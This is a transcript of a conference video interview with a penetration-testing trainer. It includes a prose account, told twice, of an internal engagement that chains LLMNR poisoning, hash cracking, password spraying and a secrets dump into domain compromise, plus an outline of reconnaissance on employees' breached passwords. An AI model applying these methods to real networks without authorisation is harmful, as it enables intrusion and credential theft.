BSides Ahmedabad Hacker Interviews: The Cyber Mentor (@TCMSecurityAcademy )

hi Pete tell us about yourself yeah my name is Heath Adams I am the founder and CEO of TCM security we are a dual-headed organization we do cyber security Consulting on one side of the organization and on the other side of the organization we do cyber security training so my background is in ethical hacking and youtubing and training so I kind of took that and put that into a organization where we have the ability to help clients and do Consulting along that side but also help students and educate students and bring in the new generation of students into cyber security okay so what made you move from an ethical hacker to a businessman yeah actually it started with my YouTube

channel so I was doing YouTube creating content and I was working as a penetration tester and I started having clients come to the job I was working at and asking for me specifically requesting me to work on the jobs and I wasn't seeing any Kickback or any benefit from that so a light bulb went off in my head and I said hey I could probably go do this on my own if people are already requesting me so I ended up quitting my job and just starting my own company and soon enough people started coming and requesting me to do pen tests and that's how the company took off great so what has been your most

interesting hack yeah so I've had quite a few I'll tell one that is very recent within the last month and we were doing an internal engagement which means that we were hacking an organization from the inside so that assumes a breach or somehow that you got into their Network and a lot of internal engagements revolve around active directory so with active directory there are a lot of I call them features quote-unquote features but really their vulnerabilities that ship out of the box so if the organization's ever had a pen test before we see a lot of these common vulnerabilities so one of those vulnerabilities is what's called llmnr poisoning and that stands for link localcast multi-name resolution

and what that does is you intercept traffic in a man in the middle position and when you intercept that traffic you can respond to events and actually capture a hash of a user if the user's hash is weak we are able to take that offline and then crack it we were capturing a lot of hashes in this environment which is very standard and we're able to go offline and crack these hashes but the issue was that none of these hashes led anywhere these accounts were all set up properly there was no local administrator rights on their machines there was no local administrator rights in the domain they had no access to anything in the domain

so with that it started eliminating a lot of the attacks that we could see there are attacks known to active directories such as smv relay we had an attack called ipv IPv6 relay which was not working either so it started to allow us to really have to think outside the box so what I did was I started looking at users and permissions that they had in the network and I found a user that had access to all the file shares for some reason they were overly permissive they didn't have a reason or a right to have access to these file shares but they did anyway so what I was able to do is start digging around these

file shares and I found a a file within a domain administrator share that file was a so he what has been your most interesting hack yeah we've actually had quite a few but I'll talk about one that's really recent so last month we were working on an internal engagement and when I say internal engagement I mean that we're working from within a network so in that situation we assume a breach of the network whether somebody came and dropped a laptop off or somebody compromised an employee regardless the situation we're inside the network and most networks that we do internal pen testing for they are using what's called active directory active directory ships with a lot of

quote-unquote features that are vulnerable they ship out of the box with these vulnerabilities and we abuse those vulnerabilities to gain access to other machines and eventually gain access to the domain controller and compromise The Domain in this particular pen test we were doing what was called llmr poisoning which is link local cast multi-name resolution and that is a man in the middle attack where we sit and respond to traffic that comes through the network uh what happens is those responses generate user hashes and we could take those hashes offline and actually try to crack them we were getting a lot of hashes on this assessment and we were cracking a lot of hashes which is usually really

successful because we can then use that to move laterally through the network in this situation however we weren't able to move anywhere because this organization had properly set up their local administrator rights no users were local admins no users had access to anything they had certain software anti-virus and detection software going in the network so it was very difficult to get anywhere what I ended up doing was starting to look for other outside the box ideas I took one of the users and found that they had overly permissive access to a file share we were able to see all the file shares in fact where most users were not able to see anything this user could see

everything and this was just an accidental misconfiguration it was just a one-time thing and this user could access any user's file share including domain admins so I started digging around and I went into a domain admin share folder and found a document that was a setup instruction document for a Mac instruction guide so this is how they would set up their MacBooks when they got them and received them brand new well this document had a administrator password in it so I grabbed the administrator password that was in there and I did what was called password spraying around the network I just used the username of administrator and that password that I found and I passed it along to every single computer

inside the network and one computer still was using that that username and that password with that one computer I was able to log in and we can do what is called a secret stump which allows us to see any of the hashes that are stored on the computer and anything that may be running in registry which sometimes if we find something in registry that is stored in clear text in this instance a domain administrator account was running in clear text so we were able to pull a clear text password of a domain administrator we were able to use that then to log into the network and compromise the domain so it went from a organization paying quite a bit

of money for antivirus for detection software doing a lot of things right to having one overly permissive user have access to one file share that had access to one password that worked and that password is able to dump out an administrative password domain app and password which allowed for the whole compromise so it was a very unique chain of attacks that I hadn't seen before but it was also very interesting because it was thinking outside the box in such a way that we'll probably never see that one directly again great so uh Having learned about your interesting hack the next question is somewhat linked to it could you help us understand what you do to keep up with

all the new trends yeah it's very difficult there's a new hacks coming out every day and there's new defenses coming out every day and honestly I do a mixture of Twitter so if you use Twitter there's some great tools that are available Twitter actually has one called tweetdeck which allows you to curate tweets and see certain boards so I have tweets curated for me that are directly related to news articles and news postings from organizations that are posting zero day exploits in the latest and greatest that's out there the other thing is I think Community is very important we have a Discord server for TCM security and people will start posting hey did you see this exploit

that just came out are you seeing what's happening right now and word of mouth is one of the greatest ways to get access to up-to-date and current information so it's a mixture of just tracking the news and curating different boards and feeds I've seen people do RSS feeds into Discord servers or slacks servers or whatever it might be I've seen people curate different blogs and I've seen people just use Community as well and that's something that I really use to gain information okay any line of advice to the beginners yeah my biggest advice is to run your own race I think that so many people are focused on what everybody else is doing especially with social media we are

focused on the big bug bounties that are paid out we are focused on the people that are getting all the latest and greatest certifications and we really need to focus on ourselves we aren't going to just pick up bug bounty hunting on day one and start becoming fifty thousand dollar Bug Hunter a hundred thousand dollar Bug Hunter it takes a lot of practice and it takes a lot of failure to get there and we don't see people post their failures most the time we only see the successes uploaded to the top so what you need to worry about is making sure that you are focusing on yourself you're taking a path that you are excited about that gets you

motivated and makes you want to wake up in the morning and to do whatever it is if that's hacking if that's specifically web app or network or whatever you just want to make sure that it's something that motivates you and that you strive to improve to get better yourself every day and use that to motivate yourself as opposed to chasing down what others are doing you should just be running your own race all right so how do you approach a Target for me I do a lot of network pen testing so a lot of that is related to external internal pen tests so a lot of that is what's called open source intelligence or ocean and it involves a lot of

digging up information about people we want to find out have employees of an organization been involved in any breaches if they've been involved in any breaches can we find any passwords related to that breach can we find passwords related to their personal accounts do those passwords work anywhere do we see any patterns with these passwords what are the username structures what are the email structures is the organization using a strong password policy so it comes down to how much information can you gather especially on the external side because we want to know hey how hard is this organization going to be to hack into when it comes to external facing assets vulnerability scanning doesn't really go

that far so what I tell my clients is that if I find a vulnerability that's so severe that I can hack into external generally then somebody else has probably already found it because Bots are scanning the internet all the time 24 7. so it really comes down to what can we find about the users what can we find about the people and then can we dig up information to log into an email address or log into a VPN do we need to bypass multi-factor do we need to social engineer them if we need to social engineer them can we find information about the employees or what systems they use or what they like there's a lot of

different research that gets involved but mostly what we're doing is reconnaissance on individuals and people we're doing reconnaissance on the organization and we're trying to find out how they can tie those in together to effectively break into an organization okay how do you balance your personal life and work that is a million dollar question uh it's very very difficult to do and I feel like I don't always do it well if I'm being candid what I try to do is I try to make sure that I take time to spend time with my my family so what I'll do is I'll wake up early and uh my wife's still asleep I'll wake up and I will start working so that way

when she gets up I have time to spend two with her in the morning to have coffee with her and I can chat with her and talk with her and then I'll work until the end of the day and then we'll spend some time together and we'll again we'll watch some TV maybe watch a movie go do something and then I'll come back and maybe I'll put in a little bit more work I do work a lot but I think that there's value that you have to have in your relationships as well you need to make time for your friends you need to make time for your family you can't just focus on work 24 7 or you're going to

lose everybody that's around you all right last but not the least how has been your experience with besides Ahmedabad it has been fantastic I didn't know what to expect when I came out here I made a promise last year that if I was ever invited to Keynote because I couldn't make it out last year that I would come and I'm so glad that I did I've got to meet a lot of people and I have just got to experience India firsthand and I never thought in a million years I would be able to do this so I'm incredibly grateful to be here and I'm incredibly grateful to meet all the people of India I legitimately felt like a celebrity and I

have been taking pictures non-stop for the last six hours and it's been an incredible experience because there's so many people that come up to me and just talked about how their lives have changed from from our training from courses and how we've made it accessible to them and so many people have told me hey I work in the field now I am doing this because of you and you hear that sometimes but especially other conferences but I've never had that experience quite like I've seen today and I'm just getting to meet the people and see how friendly everybody is here in the hospitality that's here and everybody has just treated me excellent and besides it's rolled out the red

carpet and it's been an incredible experience I hope to come back again thank you Lee it has been a pleasure hosting you and we hope to see you year after year at besides thank you so much